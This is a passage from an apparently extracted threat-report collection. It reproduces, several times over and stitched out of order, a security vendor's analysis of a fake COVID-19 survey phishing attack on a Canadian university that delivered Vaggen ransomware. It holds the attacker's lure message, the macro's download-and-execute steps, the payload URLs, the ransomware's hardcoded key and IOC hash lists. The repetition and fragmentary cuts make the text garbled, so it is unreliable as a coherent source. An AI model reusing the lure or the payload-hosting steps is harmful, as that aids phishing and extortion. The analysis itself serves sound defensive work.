k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 355 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 356 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 357 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 358 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 359 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 360 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 361 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 362 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 363 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 364 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 365 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 366 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 367 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 368 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 369 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 370 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 371 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 372 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 373 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 374 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 375 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 376 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 377 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 378 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 379 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 380 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 381 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 382 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 383 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 384 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 385 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 386 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 387 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 388 of 